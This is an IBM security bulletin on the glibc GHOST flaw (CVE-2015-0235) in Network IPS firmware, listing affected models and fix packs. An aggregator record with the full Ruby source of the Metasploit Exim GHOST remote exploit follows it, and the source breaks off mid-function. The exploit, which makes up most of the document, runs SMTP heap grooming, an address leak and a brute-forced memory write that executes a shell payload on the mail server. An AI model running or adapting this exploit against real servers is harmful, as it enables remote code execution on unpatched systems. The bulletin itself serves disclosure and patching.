## Summary
GNU C library (glibc) vulnerability that has been referred to as GHOST affects IBM Security Netwoik Intrusion Prevention System.
## Vulnerability Details
**CVEID: **[_CVE-2015-0235_](<https://vulners.com/cve/CVE-2015-0235>)
**DESCRIPTION: **glibc is vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the __nss_hostname_digits_dots() function. By sending an invalid hostname argument, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.
CVSS Base Score: 7.6
CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/100386_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/100386>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:H/Au:N/C:C/I:C/A:C)
## Affected Products and Versions
Products: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000
Firmware versions: 4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3
## Remediation/Fixes
[_4.6.2.0-ISS-ProvG-AllModels-System-FP0006_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.2
[_4.6.1.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.1
[_4.6.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6
[_4.5.0.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.5
[_4.4.0.0-ISS-ProvG-AllModels-System-FP0010_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.4
[_4.3.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm%2FTivoli%2FProventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
for all IBM Security Network Intrusion Prevention System products at Firmware version 4.3
## Workarounds and Mitigations
None
##
{"zdt": [{"lastseen": "2018-01-10T07:05:00", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-03-19T00:00:00", "type": "zdt", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-03-19T00:00:00", "id": "1337DAY-ID-23392", "href": "https://0day.today/exploit/description/23392", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? (no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n \r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n \r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n \r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n \r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n \r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n \r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n \r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n return check_code\r\n end\r\n \r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n \r\n private\r\n \r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n \r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n \r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n \r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n \r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n \r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n \r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n \r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n \r\n # try different heap_shift values, in case Exim's heap address contains\r\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n \r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n \r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n \r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n \r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n \r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n \r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n \r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n \r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n \r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n \r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n \r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] <=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n \r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n \r\n fail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n \r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n \r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n \r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n \r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n \r\n smtp_connect\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n \r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n \r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n \r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n \r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n \r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue child processes cannot use them.\r\n \r\n fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n \r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n \r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n \r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n \r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n \r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n \r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n \r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n \r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n \r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n \r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n \r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n \r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n \r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n \r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n \r\n (min_heap_addr ? 1 : 2).times do\r\n \r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n \r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\") if reply\r\n \r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n \r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n \r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n \r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n \r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n \r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n \r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n \r\n smtp_connect\r\n \r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n \r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite the beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n \r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n \r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n \r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n \r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n \r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n \r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n \r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n \r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n \r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal 